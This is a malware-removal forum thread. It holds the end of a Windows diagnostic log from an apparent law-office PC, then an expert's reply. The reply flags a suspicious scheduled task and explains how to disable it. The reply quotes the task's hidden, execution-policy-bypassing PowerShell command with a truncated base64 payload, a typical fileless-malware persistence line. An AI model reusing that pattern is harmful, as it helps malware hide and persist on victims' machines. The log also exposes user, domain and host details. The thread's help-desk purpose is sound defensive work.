2016-05-04 21:55 - 2016-05-04 21:55 - 00207744 _____ () \\?\C:\Program Files (x86)\CrashPlan\cpnative.dll
2016-04-18 21:06 - 2016-04-18 21:06 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-04-18 21:06 - 2016-04-18 21:06 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2016-05-25 13:05 - 2016-05-25 13:05 - 00679624 _____ () C:\Users\mkt\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\ClientTelemetry.dll
2016-06-03 04:43 - 2016-06-03 04:43 - 00347520 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\4.5.0.13208\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWDebugDll_win32.4.5.0.13208.dll
2016-06-03 04:43 - 2016-06-03 04:43 - 00436608 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\4.5.0.13208\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWDebug.4.5.0.13208.dll
2016-06-03 04:43 - 2016-06-03 04:43 - 00469376 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\4.5.0.13208\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWUtils.4.5.0.13208.dll
2016-06-03 04:43 - 2016-06-03 04:43 - 63070592 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\4.5.0.13208\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWExternLib.4.5.0.13208.dll
2016-06-03 04:43 - 2016-06-03 04:43 - 00299392 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\4.5.0.13208\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLib_win.4.5.0.13208.dll
2016-06-03 04:43 - 2016-06-03 04:43 - 06254464 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\4.5.0.13208\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWData.4.5.0.13208.dll
2016-06-03 04:43 - 2016-06-03 04:43 - 07393664 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\4.5.0.13208\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWApplication.4.5.0.13208.dll
2016-06-03 04:43 - 2016-06-03 04:43 - 13624192 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\4.5.0.13208\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLib.4.5.0.13208.dll
2016-06-03 04:43 - 2016-06-03 04:43 - 02284928 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\4.5.0.13208\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLibData.4.5.0.13208.dll
2016-06-03 04:43 - 2016-06-03 04:43 - 00353664 _____ () C:\Users\mkt\AppData\Roaming\Dashlane\4.5.0.13208\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\Kwift_DP.4.5.0.13208.dll
2016-01-19 19:45 - 2016-01-19 19:45 - 00429056 _____ () C:\Users\mkt\AppData\Roaming\Intermedia Communications\CallScape\libzmq-x86-3.0.0.0.dll
2016-03-19 20:42 - 2016-06-10 02:58 - 08919752 _____ () C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2016-06-18 10:36 - 2016-06-15 04:15 - 01745560 _____ () C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.103\libglesv2.dll
2016-06-18 10:36 - 2016-06-15 04:15 - 00091288 _____ () C:\Program Files (x86)\Google\Chrome\Application\51.0.2704.103\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\sharepoint.com -> hxxps://mktlawoffice-files.sharepoint.com
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-10-30 02:24 - 2015-10-30 02:21 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\Control Panel\Desktop\\Wallpaper -> C:\Users\mkt\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img0.jpg
DNS Servers: 192.168.11.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\StartupFolder: => "Vista Fax Daemon.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Intuit Data Protect.lnk"
HKLM\...\StartupApproved\StartupFolder: => "QuickBooks_Standard_21.lnk"
HKLM\...\StartupApproved\StartupFolder: => "QuickBooks Update Agent.lnk"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "StartCN"
HKLM\...\StartupApproved\Run32: => "Acrobat Assistant 8.0"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "StatusAlerts"
HKLM\...\StartupApproved\Run32: => "HP Software Update"
HKLM\...\StartupApproved\Run32: => "Intuit SyncManager"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKLM\...\StartupApproved\Run32: => "PlaysTV"
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\StartupApproved\Run: => "Adobe Acrobat Synchronizer"
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\StartupApproved\Run: => "Lync"
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\StartupApproved\Run: => "AppleIEDAV"
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\StartupApproved\Run: => "iCloudDrive"
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\StartupApproved\Run: => "iCloudPhotos"
HKU\S-1-5-21-2056520425-3879280740-1935492841-1125\...\StartupApproved\Run: => "iCloudServices"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{831BFFBC-FF34-45D4-9986-B11E6A3D7ED1}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{6D901468-3CD3-431B-8CCF-34A07FFAC0D0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{1616ED46-5134-45D2-ABAE-C3FFB501D04F}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color M251\Bin\HPNetworkCommunicator.exe
FirewallRules: [{C21C17E9-65E6-433D-AFC2-592FCBDD826D}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color M251\bin\EWSProxy.exe
FirewallRules: [{93806FE1-2A19-4D16-99E3-07BF83C77834}] => (Allow) C:\JPLAY\JPLAYStreamer.exe
FirewallRules: [{E3901B6F-A53B-4E8F-8489-E82B7DC327D9}] => (Allow) C:\JPLAY\JPLAYStreamer.exe
FirewallRules: [TCP Query User{CFC4ABF1-9EDD-41EB-A55B-FA37836CD5C3}C:\users\mkt\appdata\local\roon\application\roon.exe] => (Allow) C:\users\mkt\appdata\local\roon\application\roon.exe
FirewallRules: [UDP Query User{32DF005A-58F2-490B-ADA7-57BE5855864B}C:\users\mkt\appdata\local\roon\application\roon.exe] => (Allow) C:\users\mkt\appdata\local\roon\application\roon.exe
FirewallRules: [{1D6743F4-29EA-4498-82D8-6960DFF6DDC6}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{11371A1A-FE78-4B6D-98B9-4A225BB1BFB1}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{D3355D70-F3E7-4220-8E7A-090E6D75CDFB}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{07F6A40D-EC62-409F-9E6A-845C9F0F5F93}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{133349C5-F83B-4EFA-B1FE-1DAAA813216B}] => (Allow) C:\Program Files\Nuix\Proof Finder\proof_finder.exe
FirewallRules: [{A9632B3D-35FC-4F53-A674-DF68FB52094F}] => (Allow) C:\Program Files\Nuix\Proof Finder\proof_finder_console.exe
FirewallRules: [TCP Query User{94F7BA4F-F8A7-4326-8CC8-9DDA6A80AE7E}C:\program files\nuix\proof finder\bin\nuix_single_worker.exe] => (Allow) C:\program files\nuix\proof finder\bin\nuix_single_worker.exe
FirewallRules: [UDP Query User{8D9C0EDF-ED2F-4715-9B64-A1DF5B4DB6BE}C:\program files\nuix\proof finder\bin\nuix_single_worker.exe] => (Allow) C:\program files\nuix\proof finder\bin\nuix_single_worker.exe
FirewallRules: [{EFCBD60E-D105-4DEB-85B9-D9B8625C19B6}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{EC65C83B-720A-404D-B79E-A8ED27240838}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{5DD7D67F-B3FA-4AC5-BFF4-5A6A466504CB}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{8E834373-0102-4936-BBC4-78EC938F6027}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{A88616F4-B522-4681-B04F-A08DB6EB4BBD}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{C2EA623D-33D9-49AE-9B78-BDB4ECCF3F08}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{A6678A7A-1411-461E-A810-AF7DDA7728B6}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [TCP Query User{75DE2524-33A7-4012-9706-F24A977E9515}C:\program files (x86)\intuit\quickbooks 2015\qbdbmgrn.exe] => (Allow) C:\program files (x86)\intuit\quickbooks 2015\qbdbmgrn.exe
FirewallRules: [UDP Query User{B09DE443-600D-4F4F-84D5-81BF481B1979}C:\program files (x86)\intuit\quickbooks 2015\qbdbmgrn.exe] => (Allow) C:\program files (x86)\intuit\quickbooks 2015\qbdbmgrn.exe
FirewallRules: [{5290FF84-149E-4DAD-9FE8-E63D34B8DA64}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{BFFC3545-0709-4741-957B-F9B842B7B22D}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{68156257-136C-4A40-950C-ADA56C57E798}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{91BBBEED-3F58-484A-8BC8-60DEDAB2E8B5}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [TCP Query User{6C3D9C9C-8F50-4E3D-8D14-07D89E4FC694}C:\program files (x86)\ipcamtool\ipcamera.exe] => (Allow) C:\program files (x86)\ipcamtool\ipcamera.exe
FirewallRules: [UDP Query User{22458370-8C0F-4136-AA08-9E11E87C4B8C}C:\program files (x86)\ipcamtool\ipcamera.exe] => (Allow) C:\program files (x86)\ipcamtool\ipcamera.exe
FirewallRules: [{B291A4A9-093D-4D91-9A50-13DDA174FFB7}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{0ECC16AB-C279-4536-8E2F-676A17A103EC}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{D4649F65-5484-404D-9293-D942D415E866}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{1ECAB09C-1914-430A-918E-1DCD8B53EEBD}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{25D2DAA0-BE47-40A2-B7DB-1205264891F8}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{DBD02E63-5BAF-4752-8D7D-945A12F55B47}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{E43E8EAB-2509-4752-AEF4-11D48B98158A}] => (Allow) C:\Program Files (x86)\CrashPlan\CrashPlanService.exe
FirewallRules: [{4DFB6112-45D0-4398-9B52-3447A5184EBB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
09-06-2016 15:03:26 Scheduled Checkpoint
15-06-2016 09:41:37 Windows Update
22-06-2016 09:09:32 Revo Uninstaller Pro's restore point - Evercontact
23-06-2016 09:54:28 Removed Apple Application Support (32-bit)
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (06/23/2016 09:54:29 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
Error: (06/23/2016 01:28:12 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CSTrayApp.exe, version: 1.0.0.0, time stamp: 0x564338bd
Faulting module name: KERNELBASE.dll, version: 10.0.10586.306, time stamp: 0x571afb9a
Exception code: 0xe0434352
Fault offset: 0x000bdae8
Faulting process id: 0x2118
Faulting application start time: 0xCSTrayApp.exe0
Faulting application path: CSTrayApp.exe1
Faulting module path: CSTrayApp.exe2
Report Id: CSTrayApp.exe3
Faulting package full name: CSTrayApp.exe4
Faulting package-relative application ID: CSTrayApp.exe5
 
Error: (06/23/2016 01:28:12 AM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: CSTrayApp.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.InvalidOperationException
   at System.Windows.Application..ctor()
   at CSPhone.MainApplication.Main()
 
Error: (06/22/2016 10:58:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: OUTLOOK.EXE, version: 16.0.6965.2058, time stamp: 0x575aa09b
Faulting module name: ntdll.dll, version: 10.0.10586.306, time stamp: 0x571af2eb
Exception code: 0xc0000374
Fault offset: 0x00000000000ee6fc
Faulting process id: 0x3084
Faulting application start time: 0xOUTLOOK.EXE0
Faulting application path: OUTLOOK.EXE1
Faulting module path: OUTLOOK.EXE2
Report Id: OUTLOOK.EXE3
Faulting package full name: OUTLOOK.EXE4
Faulting package-relative application ID: OUTLOOK.EXE5
 
Error: (06/22/2016 10:58:32 PM) (Source: Microsoft Office 16) (EventID: 2001) (User: )
Description: Microsoft Outlook: Rejected Safe Mode action : Outlook failed to launch in safe mode. Do you want to start repair?.
Rejected Safe Mode action : Microsoft Outlook.
 
Error: (06/22/2016 10:58:30 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: OUTLOOK.EXE, version: 16.0.6965.2058, time stamp: 0x575aa09b
Faulting module name: OUTLOOK.EXE, version: 16.0.6965.2058, time stamp: 0x575aa09b
Exception code: 0xc0000005
Fault offset: 0x000000000002189b
Faulting process id: 0x259c
Faulting application start time: 0xOUTLOOK.EXE0
Faulting application path: OUTLOOK.EXE1
Faulting module path: OUTLOOK.EXE2
Report Id: OUTLOOK.EXE3
Faulting package full name: OUTLOOK.EXE4
Faulting package-relative application ID: OUTLOOK.EXE5
 
Error: (06/22/2016 10:58:24 PM) (Source: Microsoft Office 16) (EventID: 2000) (User: )
Description: Microsoft Outlook: Accepted Safe Mode action : Outlook couldn't start last time. Safe mode could help you troubleshoot the problem, but some features might not be available in this mode.
 
Do you want to start in safe mode?.
Accepted Safe Mode action : Microsoft Outlook.
 
Error: (06/22/2016 10:58:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: OUTLOOK.EXE, version: 16.0.6965.2058, time stamp: 0x575aa09b
Faulting module name: ntdll.dll, version: 10.0.10586.306, time stamp: 0x571af2eb
Exception code: 0xc0000374
Fault offset: 0x00000000000ee6fc
Faulting process id: 0xdc0
Faulting application start time: 0xOUTLOOK.EXE0
Faulting application path: OUTLOOK.EXE1
Faulting module path: OUTLOOK.EXE2
Report Id: OUTLOOK.EXE3
Faulting package full name: OUTLOOK.EXE4
Faulting package-relative application ID: OUTLOOK.EXE5
 
Error: (06/22/2016 05:03:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 5360
 
Error: (06/22/2016 05:03:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 5360
 
 
System errors:
=============
Error: (06/23/2016 09:57:14 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The JPLAY Audio Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (06/23/2016 09:57:10 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The JPLAY Streamer service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (06/23/2016 08:52:19 AM) (Source: Microsoft-Windows-GroupPolicy) (EventID: 1129) (User: NT AUTHORITY)
Description: The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has successfully processed. If you do not see a success message for several hours, then contact your administrator.
 
Error: (06/23/2016 08:52:19 AM) (Source: NETLOGON) (EventID: 5719) (User: )
Description: This computer was not able to set up a secure session with a domain
controller in domain MKTLAW due to the following: 
%%1311 = There are currently no logon servers available to service the logon request.
 
 
This may lead to authentication problems. Make sure that this
computer is connected to the network. If the problem persists,
please contact your domain administrator.
 
 
 
ADDITIONAL INFO
 
If this computer is a domain controller for the specified domain, it
sets up the secure session to the primary domain controller emulator in the specified
domain. Otherwise, this computer sets up the secure session to any domain controller
in the specified domain.
 
Error: (06/23/2016 08:51:20 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_b27b8 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (06/23/2016 08:51:20 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_b27b8 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (06/23/2016 08:51:20 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_b27b8 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (06/23/2016 08:51:20 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_b27b8 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (06/23/2016 08:51:18 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (06/23/2016 12:10:33 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
 
CodeIntegrity:
===================================
  Date: 2016-06-23 10:09:22.958
  Description: Code Integrity determined that a process (\Device\HarddiskVolume8\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume8\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-06-23 10:09:22.950
  Description: Code Integrity determined that a process (\Device\HarddiskVolume8\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume8\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-06-23 10:09:22.941
  Description: Code Integrity determined that a process (\Device\HarddiskVolume8\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume8\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-06-23 10:09:22.930
  Description: Code Integrity determined that a process (\Device\HarddiskVolume8\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume8\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-06-23 10:09:22.921
  Description: Code Integrity determined that a process (\Device\HarddiskVolume8\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume8\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-06-23 10:09:22.910
  Description: Code Integrity determined that a process (\Device\HarddiskVolume8\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume8\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-06-23 10:09:22.715
  Description: Code Integrity determined that a process (\Device\HarddiskVolume8\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume8\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-06-23 10:07:03.274
  Description: Code Integrity determined that a process (\Device\HarddiskVolume8\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume8\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-06-23 10:07:03.265
  Description: Code Integrity determined that a process (\Device\HarddiskVolume8\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume8\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-06-23 10:07:03.256
  Description: Code Integrity determined that a process (\Device\HarddiskVolume8\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume8\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-4770 CPU @ 3.40GHz
Percentage of memory in use: 17%
Total physical RAM: 24525.64 MB
Available physical RAM: 20234.99 MB
Total Virtual: 28109.64 MB
Available Virtual: 23873.43 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:238.03 GB) (Free:66.06 GB) NTFS
Drive d: (OS) (Fixed) (Total:1851.9 GB) (Free:1676.58 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 1863 GB) (Disk ID: D0C65852)
 
Partition: GPT.
 
========================================================
Disk: 1 (Size: 238.5 GB) (Disk ID: 8BE60E2D)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

 


  • 0

Advertisements

#2
RKinner
Posted 23 June 2016 - 12:14 PM

RKinner

    Malware Expert

  • Expert
  • 24,625 posts
  • MVP

You have this really ugly looking task:

 

Task: {DE0DD811-CBD9-4375-B94E-2390571C4CA8} - System32\Tasks\{7D040447-7E05-0C79-0E11-7E040578117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9520 more characters). <==== ATTENTION

 

Let's disable it.  Search for Task scheduler and hit Enter.  That should bring up the Task Scheduler window.  Click on Task Scheduler Library in the left pane.  Look in the right pane and see if you can find:

 

{DE0DD811-CBD9-4375-B94E-2390571C4CA8}

or

{7D040447-7E05-0C79-0E11-7E040578117A} 

 

Right click and Disable whichever you find (or both if both show up).  Close Task Scheduler.  Reboot.

 

Does it boot faster this time?  If it is still running slow then:

 

Get Process Explorer
 
Save it to your desktop then run it (Vista or Win7 - right click and Run As Administrator).  
 
View, Select Column, check Verified Signer, OK
Options, Verify Image Signatures
 
 
Click twice on the CPU column header  to sort things by CPU usage with the big hitters at the top.  
 
Wait a full minute then:
 
File, Save As, Save.  Note the file name.   Open the file  on your desktop and copy and paste the text to a reply.

  • 0
Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP